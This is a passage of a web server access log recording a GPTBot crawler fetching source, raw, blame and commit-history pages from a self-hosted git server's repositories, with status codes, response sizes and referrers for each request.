AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9544] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10984] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 2009102] [Gzip 22.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10193] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48961] [Gzip 17.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17183] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18353] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10934] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29882] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 2190] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" -[17/Feb/2026:13:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 191014] [Gzip 11.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 106894] [Gzip 12.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:13:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" [Client 74.7.227.38] [Length 11407] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f" -[17/Feb/2026:13:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" [Client 74.7.227.38] [Length 11699] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:13:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" [Client 74.7.227.38] [Length 11073] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:13:59:01 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" -[17/Feb/2026:13:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" [Client 74.7.227.38] [Length 10826] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" -[17/Feb/2026:13:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" [Client 74.7.227.38] [Length 11653] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" -[17/Feb/2026:13:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10422] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13038] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 42723] [Gzip 22.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 12754] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" -[17/Feb/2026:13:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 10833] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" -[17/Feb/2026:13:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 13427] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" -[17/Feb/2026:13:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23928] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" -[17/Feb/2026:13:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" -[17/Feb/2026:13:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" [Client 74.7.227.38] [Length 19733] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" -[17/Feb/2026:13:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" [Client 74.7.227.38] [Length 10259] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" -[17/Feb/2026:13:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 15793] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" -[17/Feb/2026:13:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 14301] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" -[17/Feb/2026:13:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10501] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" -[17/Feb/2026:13:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 14870] [Gzip 9.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 259718] [Gzip 13.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 15450] [Gzip 8.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" -[17/Feb/2026:13:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 